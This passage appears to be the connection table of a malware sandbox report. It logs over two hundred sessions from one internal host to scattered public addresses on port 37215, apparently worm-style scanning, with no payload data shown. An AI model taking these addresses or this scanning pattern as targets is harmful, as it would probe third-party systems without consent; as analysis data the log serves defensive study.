                                          17882192.168.2.235899841.241.224.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17883192.168.2.2356612197.235.31.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17884192.168.2.233786241.15.0.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17885192.168.2.2341266157.195.60.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17886192.168.2.2334236197.44.128.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17887192.168.2.235254232.16.110.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17888192.168.2.2340912131.19.23.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17889192.168.2.234297244.54.70.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17890192.168.2.235416241.194.20.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17891192.168.2.2360984128.1.132.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17892192.168.2.2348086181.157.79.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17893192.168.2.2341852197.45.1.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17894192.168.2.2342006197.137.94.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17895192.168.2.2335430197.165.230.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17896192.168.2.2344690153.217.86.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17897192.168.2.233365441.102.188.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17898192.168.2.2345502157.85.137.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17899192.168.2.234749869.66.85.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17900192.168.2.234766641.254.49.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17901192.168.2.2350074197.29.231.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17902192.168.2.234609241.54.28.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17903192.168.2.2337014157.18.85.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17904192.168.2.2352848160.221.160.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17905192.168.2.2352820197.45.23.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17906192.168.2.2340676157.150.72.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17907192.168.2.2348792157.158.181.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17908192.168.2.235214241.245.69.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17909192.168.2.234289241.65.176.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17910192.168.2.2347782197.27.204.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17911192.168.2.2352092157.191.233.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17912192.168.2.2347784197.167.120.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17913192.168.2.2353300197.96.220.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17914192.168.2.2343836170.162.178.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17915192.168.2.2358058157.190.85.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17916192.168.2.2340738207.92.5.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17917192.168.2.2350414197.0.50.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17918192.168.2.2335182125.24.37.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17919192.168.2.2333246157.234.112.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17920192.168.2.2352606157.176.70.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17921192.168.2.233552641.169.227.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17922192.168.2.2353168157.126.92.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17923192.168.2.2347778197.86.16.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17924192.168.2.2336098140.229.92.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17925192.168.2.235511641.154.209.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17926192.168.2.234482441.14.225.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17927192.168.2.235710241.67.169.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17928192.168.2.2339772126.102.16.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17929192.168.2.2350740189.22.83.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17930192.168.2.234382241.46.23.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17931192.168.2.2339712197.59.102.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17932192.168.2.2357662194.102.64.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17933192.168.2.234275481.195.104.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17934192.168.2.2351054157.18.85.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17935192.168.2.235934241.85.111.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17936192.168.2.2347152157.147.157.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17937192.168.2.2348414157.56.176.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17938192.168.2.2339292197.123.33.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17939192.168.2.2351240157.159.62.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17940192.168.2.2354854197.243.158.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17941192.168.2.2339462157.147.82.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17942192.168.2.2345116197.7.72.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17943192.168.2.2349134157.85.172.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17944192.168.2.2342380102.149.21.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17945192.168.2.2354812165.199.35.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17946192.168.2.2350768157.231.105.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17947192.168.2.2337770197.106.251.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17948192.168.2.235977241.45.18.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17949192.168.2.2339170210.75.17.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17950192.168.2.234067093.195.185.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17951192.168.2.2342808140.193.30.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17952192.168.2.2335662197.22.212.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17953192.168.2.234776841.182.232.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17954192.168.2.233334084.199.224.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17955192.168.2.2356658157.226.122.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17956192.168.2.2341246157.102.91.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17957192.168.2.2340348157.31.83.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17958192.168.2.2357372206.23.74.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17959192.168.2.2342460197.149.13.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17960192.168.2.235588841.155.108.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17961192.168.2.235395841.234.50.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17962192.168.2.234111241.206.117.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17963192.168.2.2340562157.109.179.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17964192.168.2.2349492216.17.144.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17965192.168.2.234432241.223.21.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17966192.168.2.2351724125.195.115.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17967192.168.2.2345902184.150.68.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17968192.168.2.2338616157.49.94.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17969192.168.2.233959041.20.132.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17970192.168.2.2356754197.75.94.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17971192.168.2.2345564157.215.160.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17972192.168.2.2347126157.211.119.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17973192.168.2.2348748157.61.181.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17974192.168.2.2343136157.144.10.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17975192.168.2.2335972197.51.215.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17976192.168.2.235850641.219.89.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17977192.168.2.2360782197.156.221.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17978192.168.2.2346198197.240.244.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17979192.168.2.233677641.140.237.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17980192.168.2.2355244157.2.88.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17981192.168.2.235076441.219.35.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17982192.168.2.233783241.223.159.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17983192.168.2.2342812157.16.41.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17984192.168.2.2342040197.24.47.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17985192.168.2.2349196197.42.0.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17986192.168.2.2333174197.16.234.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17987192.168.2.235057471.13.250.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17988192.168.2.2341704157.217.254.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17989192.168.2.2356404197.167.160.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17990192.168.2.2352264113.90.6.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17991192.168.2.2338640157.20.117.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17992192.168.2.235879041.194.225.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17993192.168.2.2336680157.192.20.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17994192.168.2.2338244180.178.110.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17995192.168.2.233451241.224.79.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17996192.168.2.2355586142.241.189.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17997192.168.2.2358386149.127.9.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17998192.168.2.2351276110.200.147.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17999192.168.2.2354964157.167.31.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18000192.168.2.2338062157.8.212.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18001192.168.2.2348822157.122.111.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18002192.168.2.234763241.215.133.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18003192.168.2.2349326197.14.45.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18004192.168.2.233502041.20.254.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18005192.168.2.2346346197.143.254.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18006192.168.2.2359382157.67.154.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18007192.168.2.2340042197.23.126.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18008192.168.2.2360666157.219.91.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18009192.168.2.2355516157.198.176.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18010192.168.2.2358350157.163.89.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18011192.168.2.2335292197.187.62.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18012192.168.2.2337504157.54.219.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18013192.168.2.2357918157.49.111.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18014192.168.2.235187641.70.16.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18015192.168.2.2345058197.254.246.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18016192.168.2.2357380157.229.25.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18017192.168.2.2348902157.120.33.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18018192.168.2.2343352126.166.82.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18019192.168.2.235234641.105.178.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18020192.168.2.2354256157.142.190.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18021192.168.2.235713673.45.182.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18022192.168.2.2348740197.193.209.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18023192.168.2.236091241.211.148.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18024192.168.2.234483841.28.228.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18025192.168.2.2355078197.111.0.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18026192.168.2.2353624157.242.41.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18027192.168.2.233500236.175.3.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18028192.168.2.2340610197.237.186.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18029192.168.2.233298498.100.237.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18030192.168.2.2336102197.165.127.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18031192.168.2.2337826157.220.241.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18032192.168.2.2356092197.225.155.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18033192.168.2.2351706197.185.137.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18034192.168.2.2349366157.111.136.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18035192.168.2.2338128157.178.106.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18036192.168.2.2356476157.151.111.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18037192.168.2.2348778197.58.241.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18038192.168.2.2337496197.121.60.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18039192.168.2.2334120157.87.141.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18040192.168.2.234501013.56.212.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18041192.168.2.2354750197.165.228.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18042192.168.2.2356818157.20.114.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18043192.168.2.2347262157.231.92.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18044192.168.2.234866472.194.158.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18045192.168.2.235141040.15.176.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18046192.168.2.2342746198.177.45.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18047192.168.2.2339852183.27.220.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18048192.168.2.234428441.189.40.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18049192.168.2.2352082157.14.207.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18050192.168.2.2340224197.96.187.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18051192.168.2.233729641.48.135.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18052192.168.2.2335692117.164.124.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18053192.168.2.233738241.120.135.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18054192.168.2.2351136157.177.22.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18055192.168.2.2360318157.76.107.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18056192.168.2.2350860142.211.106.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18057192.168.2.2339484197.251.35.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18058192.168.2.2340302221.65.113.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18059192.168.2.2358744157.55.238.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18060192.168.2.2356900206.48.91.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18061192.168.2.233910241.233.115.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18062192.168.2.2336314197.95.149.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18063192.168.2.2348210197.201.173.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18064192.168.2.234403841.47.158.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18065192.168.2.2359088197.2.245.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18066192.168.2.2335694157.56.54.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18067192.168.2.233734041.26.251.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18068192.168.2.236047241.70.159.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18069192.168.2.2336756197.240.130.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18070192.168.2.2335478197.32.224.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18071192.168.2.2343710197.44.73.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18072192.168.2.233395641.167.123.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18073192.168.2.2358466118.121.131.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18074192.168.2.2339154157.185.231.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18075192.168.2.235480441.30.151.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18076192.168.2.235428420.103.93.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18077192.168.2.2346898206.215.240.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18078192.168.2.2340290157.230.60.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18079192.168.2.2349748197.14.92.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18080192.168.2.233409241.78.121.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18081192.168.2.2343944197.216.72.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18082192.168.2.2359214203.214.74.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18083192.168.2.2351944157.137.202.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18084192.168.2.235921282.135.176.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18085192.168.2.235100241.157.176.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18086192.168.2.2357750197.64.2.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18087192.168.2.2352606197.134.249.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18088192.168.2.2355654157.3.177.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18089192.168.2.2347300103.198.227.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18090192.168.2.233797082.101.254.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18091192.168.2.235192298.125.113.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18092192.168.2.2340648157.25.233.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18093192.168.2.2332782163.35.90.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18094192.168.2.235357441.234.233.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18095192.168.2.2340570197.55.167.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18096192.168.2.234894441.141.1.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18097192.168.2.2334108197.2.180.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18098192.168.2.2358530157.201.180.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18099192.168.2.2354650197.246.202.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18100192.168.2.2351502197.56.19.8537215
